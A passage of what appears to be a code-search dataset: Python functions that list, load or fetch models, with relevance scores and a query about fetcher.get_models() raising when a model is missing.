pc.CloudyModel(model_name, verbose=0, **kwargs)\n if not cm.aborted:\n m.append(cm)\n if verbose:\n print('{0} model read'.format(outfile[0:-4]))\n except:\n pass\n pc.log_.message('{0} models read'.format(len(m)), calling='load_models')\n return m", "def getModels(makeURL):\n\n #Get make page as Soup\n soup, _ = getPage(makeURL)\n\n #Check if page available\n if soup is None:\n #Not available - break\n print(\"Can't find Make URL\")\n quit()\n\n #Try to find models list\n try:\n #Find span with text \"Make\"\n span = soup.find(class_=\"srp-filter-group__filter-name\", text=\"Make\")\n #Move up two parents\n a = span.parent.parent\n #Find all filter names\n b = a.find_all(class_=\"srp-list-filter__item-link link link--no-underline\")\n models = [i['href'] for i in b]\n models = models[1:]\n except:\n print(makeURL)\n models=[]\n \n logger.debug(f\"Models include: {models}\")\n return models", "def get_models_for_make_id(self, make_id):\n return self.get('vehicles/GetModelsForMakeId/{}'.format(make_id))", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_model(self, app_label, model_name,\n seed_cache=True, only_installed=True):\n if seed_cache:\n self._populate()\n if only_installed and app_label not in self.app_labels:\n return None\n return self.app_models \\\n .get(app_label, SortedDict()) \\\n .get(model_name.lower())", "def test_get_models_by_make(self):\n request = self.factory.get('/api/v1/cars', {'make': 'BMW',\n 'distance': 100000})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n self.assertNotEqual(response.data['models'], [])\n self.assertIs(type(response.data['models'][0]['model']), str)\n self.assertIs(type(response.data['models'][0]['count']), int)", "def availablemodels(self):\n return self.__models.keys()", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "async def list_models(\n list_models_request: ListModels,\n token: str = Depends(oauth2_scheme),\n):\n try:\n logging.info(\"Calling /gcp/automl/list_models endpoint\")\n logging.debug(f\"Request: {list_models_request}\")\n if decodeJWT(token=token):\n response = ManageModelController().list_model_controller(\n request=list_models_request\n )\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid access token\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n except Exception as error:\n logging.error(f\"Error in /gcp/automl/list_models endpoint: {error}\")\n raise error", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def get_installed_models():\n global _installed_models_cache\n if _installed_models_cache is not None:\n return _installed_models_cache\n _installed_models_cache = []\n for a in settings.INSTALLED_APPS:\n try:\n _installed_models_cache.append(__import__(a + '.models', '', '', ['']))\n except ImportError:\n pass\n return _installed_models_cache", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_model(source: str, supported_model_name: str, model_id: str):\n connector = __get_connector(source)\n supported_model = __get_supported_model(supported_model_name)\n\n try:\n model = connector.get(supported_model, model_id)\n return __parse_response(source, model)\n except Exception as e:\n abort(500, e)", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def get_supported_models(self):\n # type: () -> list\n return [model for model in self.__MODELS]", "def test_list_models():\n model_names = find_model_files()\n listed_model_names = list_available_nagl_models()\n assert listed_model_names == model_names", "def list_models():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_models\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)", "def get_models_from_table_names(table_names, force=None):\n models = []\n errors = []\n for table_name in table_names:\n try:\n models.append(\n get_model_from_table_name(table_name)\n )\n except (\n IncorrectTableNameException,\n ModelDoesNotExistException\n ) as exc:\n if not force:\n raise exc\n errors.append(exc.args)\n return models, errors", "def load_models_by_type(model_type):\n\n # loading the models for each language supported\n return [(lang_id, load_model(lang_id, model_type)) for lang_id in language_id_to_code_mapper]", "def load_best_model_json():\n with open(qualify_full_filepath(f\"models.json\", HERE), \"r\") as infile:\n models = json.load(infile)\n return models", "def _get_models_from_metafile(dir: str):\n meta_indexes = load(osp.join(dir, 'model-index.yml'))\n for meta_path in meta_indexes['Import']:\n # meta_path example: mmcls/.mim/configs/conformer/metafile.yml\n meta_path = osp.join(dir, meta_path)\n metainfo = load(meta_path)\n yield from metainfo['Models']", "def find_models(page_index=0):\n search_query = {\n 'query': {\n 'match_all': {}\n }\n }\n\n results = find_items('model', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for model in results['hits']['hits']:\n records.append({\n 'name': model['_id'],\n 'date_created': model['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def list_models(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['search_pattern']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Get the list of models based on the search pattern\n search_pattern = self.request_df.loc[0, 'search_pattern']\n \n # If the search pattern is empty default to all models\n if not search_pattern.strip():\n search_pattern = '*'\n \n # Get the list of models as a string\n models = \"\\n\".join([str(p).split(\"\\\\\")[-1] for p in list(pathlib.Path(self.path).glob(search_pattern))])\n \n # Prepare the output\n self.response = pd.Series(models)\n \n # Finally send the response\n return self.response", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def iter_models(self):\n return iter(self.model_list)", "def get_model(params):\r\n module_name, class_name = params.model.name.rsplit('.', 1)\r\n i = importlib.import_module(module_name)\r\n return getattr(i, class_name)", "def load_models(model_base_name=None, num_voices=4):\n models = []\n for voice_index in range(num_voices):\n model_path_name = os.path.join(PACKAGE_DIR,\n 'models/' + model_base_name+ '_' + str(\n voice_index))\n model = load_model(model_path_name)\n model.compile(optimizer='adam',\n loss={'pitch_prediction': 'categorical_crossentropy'\n },\n metrics=['accuracy'])\n models.append(model)\n return models", "def list_models(\n architecture: Optional[str] = typer.Option(None, '-n', '--name', help='Model architecture name'),\n framework: Optional[Framework] = typer.Option(None, '-fw', '--framework', case_sensitive=False,\n help='Framework'),\n engine: Optional[Engine] = typer.Option(None, '-e', '--engine', case_sensitive=False, help='Serving engine'),\n version: Optional[int] = typer.Option(None, '-v', '--version', help='Version'),\n list_all: Optional[bool] = typer.Option(\n False,\n '-a', '--all', is_flag=True,\n help='Display queried models. otherwise, only partial result will be shown.'\n ),\n):\n\n payload = remove_dict_null(\n {'architecture': architecture, 'framework': framework, 'engine': engine, 'version': version}\n )\n with requests.get(f'{app_settings.api_v1_prefix}/model', params=payload) as r:\n model_list = r.json()\n model_view([MLModel.parse_obj(model) for model in model_list], list_all=list_all)", "def test_downloadAllModels(self):\n\t\tmodelOptions = cancerscope.config.getmodelsdict() ## MODIFIED FROM cancerscope.getmodelsdict() on March 17 2020\n\t\tassert len(modelOptions.keys()) == 5\n\t\tscope_ensemble_obj = cancerscope.scope_ensemble.scope() ## MODIFIED FROM cancerscope.scope() on March 17 2020\n\t\t#my_downloaded_models = cancerscope.get_models.getmodel() ## This should retrieve all models\n\t\tmy_downloaded_models = scope_ensemble_obj.downloaded_models_dict\n\t\tassert len(my_downloaded_models.keys()) == 5\n\t\tfor k_model in my_downloaded_models.keys():\n\t\t\tmodelname_address = my_downloaded_models[k_model]\n\t\t\t\"\"\"For each model, test if model dir exists, then set up the model once\"\"\"\n\t\t\tself.assertTrue(os.path.isdir(modelname_address))\n\t\t\tself.assertTrue(os.path.exists(\"\".join([modelname_address, \"/lasagne_bestparams.npz\"])))\n\t\t\t\"\"\"TO BE FIXED: THEN SET UP MODEL (memory issues in travis (3 GB RAM there)\"\"\"\n\t\t\t#lmodel = cancerscope.scopemodel(modelname_address_pair[k_model])\n\t\t\t#lmodel.fit()\n\t\t\t#self.assertEqual(len(lmodel.features), 17688)\n\t\t\t#del lmodel; lmodel=None\n\t\t\t#for i in range(3):\n\t\t\t#\tgc.collect()", "def _load_predictiveModel(self):\n # type: () -> None\n\n for model in self.__MODELS:\n if isinstance(self._model, model):\n self._classLabels = self._model.classes_ # Assign the classes available in the classifier to the labels container.\n return\n\n raise InvalidModelException(\n \"Did not recieve a model that was one of the expected types. Use model_types() to see supported models. Recieved type {0}\".format(\n type(self._model)))", "def check_models_ready(self):\n if not self.models_ready:\n raise RuntimeError(\"Models aren't loaded yet.\")", "def load_model(seriesname):\n LOG.debug(\"Calling load_model() with the following arguments:\")\n LOG.debug(\"seriesname = %s\"%seriesname)\n \n result = []\n return result", "def _request_model(self, instance, success, get_embedded=True):\n coll = self.get_collection('_model')\n if get_embedded:\n callback = partial(self._get_embedded_model_names,\n instance=instance,\n success=success)\n else:\n callback = success\n\n try:\n instance['_model']\n except KeyError:\n raise tornado.web.HTTPError(400, 'Missing model key')\n coll.find_one({'_id': instance['_model']},\n callback=callback)", "def test_model_runs(self):\n\n for m in self.models:\n self.assertTrue(m is not None)\n self.assertTrue(isinstance(m, topic_model.TopicModel))", "def list_supported_models() -> Sequence[str]:\r\n return list(_MODELS)", "def get_models():\n all_models = gfile.Glob(os.path.join(MODELS_DIR, '*.meta'))\n model_filenames = [os.path.basename(m) for m in all_models]\n model_numbers_names = sorted([\n (shipname.detect_model_num(m), shipname.detect_model_name(m))\n for m in model_filenames])\n return model_numbers_names", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models", "def test_load_model_method(self):\n # arrange\n # instantiating the model manager class\n model_manager = ModelManager()\n\n # adding the model\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n model_object = None\n # accessing the MLModelMock model object\n try:\n model_object = model_manager.get_model(qualified_name=\"qualified_name\")\n except Exception as e:\n exception_raised = True\n print_tb(e)\n\n # assert\n self.assertFalse(exception_raised)\n self.assertTrue(model_object is not None)", "def init_models(self):\n from ron import Application\n from ron.models.basemodel import BaseModel\n if self.models == None or not Application().db:\n return\n models_namespace = self.__namespace + \".models\" # TODO: allow customize this\n try:\n models_package = import_module(models_namespace)\n except:\n models_package = None\n if models_package:\n models_modules = self._get_package_modules(models_package)\n for model_name in models_modules:\n imported_model = import_module('.' + model_name, package=models_namespace)\n for i in dir(imported_model):\n attribute = getattr(imported_model, i)\n if inspect.isclass(attribute) and issubclass(attribute, BaseModel):\n self.models.append(attribute)\n Application().db().database.create_tables(self.models)", "def models(self):\n return self.config.models()", "def load_models(model_dirs):\n models = []\n for directory in model_dirs:\n filenames = os.listdir(directory)\n for filename in filenames:\n if filename.endswith('.pth'):\n model_path = os.path.join(directory, filename)\n model = get_model()\n target_device = None if torch.cuda.is_available() else 'cpu'\n model.load_state_dict(torch.load(model_path, map_location=target_device))\n models.append(model)\n return models", "def get_model(self, id):\n if id not in self._models:\n raise Exception(f'model with the id {id} does not exist')\n return self._models[id]", "def check_models(*, schemas: _oa_types.Schemas) -> types.TModels:\n not_constructables = iterate.not_constructable(schemas=schemas)\n not_constructables_result = map(\n lambda args: (args[0], check_model(schemas, args[1])), not_constructables\n )\n return dict(not_constructables_result)", "def GetModel(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models" ]
[ "0.7327567", "0.69435924", "0.67743224", "0.67731684", "0.666128", "0.66390353", "0.6595562", "0.6590047", "0.64084816", "0.6316313", "0.6267025", "0.62651926", "0.626041", "0.6233475", "0.6200443", "0.61957514", "0.61935633", "0.61921066", "0.61672646", "0.61589247", "0.6154951", "0.6127301", "0.6122401", "0.6119595", "0.60895294", "0.6084304", "0.6076584", "0.60558337", "0.60204977", "0.60099065", "0.6000378", "0.59894866", "0.5973256", "0.59708786", "0.59646904", "0.5959054", "0.59453535", "0.5932688", "0.59304863", "0.5917831", "0.59142953", "0.5913386", "0.59090734", "0.5888891", "0.58860165", "0.58712643", "0.58348227", "0.5808802", "0.5807494", "0.5796432", "0.5787363", "0.5786724", "0.5774374", "0.5767773", "0.5763746", "0.5724312", "0.5718138", "0.57111436", "0.57084054", "0.5691953", "0.5680172", "0.5664144", "0.56401724", "0.56401724", "0.5574124", "0.5539155", "0.5536057", "0.5520777", "0.5517591", "0.550578", "0.5502662", "0.5495101", "0.5493489", "0.5487742", "0.54824877", "0.54764974", "0.54740924", "0.54740924", "0.54664975", "0.54634917", "0.5454626", "0.5453488", "0.54526365", "0.5449064", "0.5448379", "0.544452", "0.543344", "0.54320335", "0.5430745", "0.54078996", "0.5407478", "0.5388507", "0.5386578", "0.5386476", "0.5382068", "0.5374689", "0.5372811", "0.53641796", "0.5361513", "0.5361345" ]
0.75194955
0
fetcher.get_models() should throw if a model is not found.
def test_get_models_throws_if_project_does_not_exist( fc: fetcher.Fetcher, project, model ): with pytest.raises(exceptions.NotFoundError) as exc: fc.get_models(project=project, model=model) assert "An error occured while getting projects." in str(exc.value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_models_throws_if_model_does_not_exist(fc: fetcher.Fetcher, project, model):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting models.\" in str(exc.value)", "def test_get_models_returns_models(fc: fetcher.Fetcher):\n ml = fc.get_models()\n assert isinstance(ml, list)\n assert isinstance(ml[0], models.LookmlModel)", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def test_get_model_method_with_missing_model(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n exception_message = \"\"\n model = None\n try:\n model = model_manager.get_model(qualified_name=\"asdf\")\n except Exception as e:\n exception_raised = True\n exception_message = str(e)\n\n # assert\n self.assertTrue(exception_raised)\n self.assertTrue(exception_message == \"Instance of model 'asdf' not found in ModelManager.\")", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def get_models(self):\n self.load()\n return self._models", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def check_models():\n # Check if Models exist\n if request.method == 'GET':\n if models_exist():\n return jsonify({'message': 'models found'})\n else:\n return jsonify({'message': 'one or more models missing'}), 409\n\n # Post Method, download models\n else:\n task = download_models.apply_async()\n task_url = url_for('model_download_status', task_id=task.id)\n return jsonify({'message': 'download started', 'location': task_url}), 202, {'Location': task_url}", "def try_models(self):\n result = os.system(\"python try_models.py\")\n return result == 0", "def ez_get_models(auth_token, options = None):\n status_code = 500\n try:\n API_REQUEST_URL = API_URL + \"/ez_get_models\"\n payload = {\n \"options\": options\n }\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer \" + str(auth_token),\n }\n response = requests.request(\n \"POST\", API_REQUEST_URL, headers = headers, data = json.dumps(payload)\n )\n status_code = response.status_code\n try:\n response_json = response.json()\n except Exception as e:\n response.raise_for_status()\n response_json[\"status_code\"] = status_code\n return response_json\n except Exception as e:\n print((traceback.print_exc()))\n return exception_return(e, status_code)", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def test_coupledmodels_get(self):\n pass", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def get_models(make):\n api_url = 'https://api.edmunds.com/api/vehicle/v2/{}/models?fmt=json&api_key={}'\\\n .format(make, API_KEY)\n r = requests.get(api_url).json()\n all_models = [model['name'] for model in r['models']]\n return all_models", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"], path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def models() -> list[str]:\n return list(models_url.keys())", "def test_get_model(self) -> None:\n get_model()", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def get_best_models(self, num_models) -> Sequence[tf.keras.Model]:\n pass", "def test_get_model_metadata_method_with_missing_model(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n excpeption_raised = False\n exception_message = None\n try:\n model_metadata = model_manager.get_model_metadata(qualified_name=\"asdf\")\n except Exception as e:\n excpeption_raised = True\n exception_message = str(e)\n\n # assert\n self.assertTrue(excpeption_raised)\n self.assertTrue(exception_message == \"Instance of model 'asdf' not found in ModelManager.\")", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def get_model(model):\n all_models = cmd.get_object_list()\n\n if len(all_models) == 0:\n logging.parser_error('No models are opened.')\n return\n\n model = model.lower()\n\n if model and (model in all_models):\n return model\n\n if len(all_models) > 1:\n logging.parser_error(\"Please specify which model you want to use. {}\".format(all_models))\n return\n\n return all_models[0]", "def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def get_all_models() -> list:\n\n conn = database_connect()\n if(conn is None):\n return None\n cur = conn.cursor()\n\n try:\n # SQL statement and execute\n sql = \"\"\"SELECT manufacturer, description, modelnumber, weight\n FROM Model\"\"\"\n cur.execute(sql, ())\n\n # Attempt to fetch first row\n result = cur.fetchall()\n\n if result == None:\n cur.close()\n conn.close()\n return []\n\n models = []\n for row in result:\n models.append(\n [row[0], row[1], row[2], row[3]]\n )\n\n cur.close()\n conn.close()\n return models\n except Exception as e:\n print(\"fff\")\n print(e)\n # If login failed, return None\n cur.close()\n conn.close()\n return []", "def test_get_model_method(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n model = None\n try:\n model = model_manager.get_model(qualified_name=\"qualified_name\")\n except Exception as e:\n exception_raised = True\n\n # assert\n self.assertFalse(exception_raised)\n self.assertTrue(type(model) is MLModelMock)", "def load_models(appname):\n return import_module('.models', appname)", "def simple_models(self, uuid=None):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n\n if uuid is None:\n r = requests.get(self.url + '/model', headers=headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)\n else:\n r = requests.get(self.url + '/model/' + uuid, headers=headers)\n if r.status_code == 200:\n return self.build_simple_model(json.loads(r.content))\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return models", "def download_all_models() -> None:\n model_keys = ModelInfo.get_all_models()\n for model_key in model_keys:\n download_model(model_key)", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def fetch_ml_model_info() -> ApiResponse:\n return _api_response(settings.ML_MODELS)", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def _get_embedded_models(self,\n model,\n instance,\n success,\n model_names):\n\n callback = partial(self._handle_embedded_models,\n model=model,\n instance=instance,\n success=success)\n self.get_models(model_names=model_names,\n callback=callback)", "def test_model_get(self):\n response = self.client().get('/model')\n self.assertEqual(response.status_code, 200)\n loaded_model = Model.from_json(response.data.decode())\n self.assertEqual(loaded_model, self.data_manipulation.get_latest_model())\n\n # All versions are removed\n self.data_manipulation.versions = {}\n\n other_response = self.client().get('/model')\n self.assertEqual(other_response.status_code, 404)", "def get(self, request):\n MODEL_NOT_FOUND = -1\n model_ids = self.request.query_params.get(\"ids\", False)\n if not model_ids:\n return HttpResponse(status=400)\n else:\n model_ids = model_ids.split(\",\")\n results = []\n for model_id in model_ids:\n try:\n model = models.ModelRun.objects.get(id=model_id)\n results.append(\n {\"name\": model.name, \"id\": int(model_id), \"status\": model.status}\n if model.is_base or model.public or model.user == self.request.user\n else {\n \"name\": model.name,\n \"id\": int(model_id),\n \"status\": MODEL_NOT_FOUND,\n }\n )\n except models.ModelRun.DoesNotExist:\n results.append({\"id\": int(model_id), \"status\": MODEL_NOT_FOUND})\n\n return Response({\"results\": results})", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def _pc_load_models(model_name = None, mod_list = None, n_sample = None, verbose = False, **kwargs):\n\n if model_name is not None:\n mod_list = glob.glob(model_name + '*.out')\n if mod_list is None or mod_list == []:\n pc.log_.error('No model found', calling='load models')\n return None\n if n_sample is not None:\n if n_sample > len(mod_list):\n pc.log_.error('less models {0:d} than n_sample {1:d}'.format(len(mod_list), n_sample),\n calling='load models')\n return None\n mod_list = random.sample(mod_list, n_sample)\n m = []\n for outfile in mod_list:\n if outfile[-4::] == '.out':\n model_name = outfile[0:-4]\n else:\n model_name = outfile\n try:\n cm = pc.CloudyModel(model_name, verbose=0, **kwargs)\n if not cm.aborted:\n m.append(cm)\n if verbose:\n print('{0} model read'.format(outfile[0:-4]))\n except:\n pass\n pc.log_.message('{0} models read'.format(len(m)), calling='load_models')\n return m", "def getModels(makeURL):\n\n #Get make page as Soup\n soup, _ = getPage(makeURL)\n\n #Check if page available\n if soup is None:\n #Not available - break\n print(\"Can't find Make URL\")\n quit()\n\n #Try to find models list\n try:\n #Find span with text \"Make\"\n span = soup.find(class_=\"srp-filter-group__filter-name\", text=\"Make\")\n #Move up two parents\n 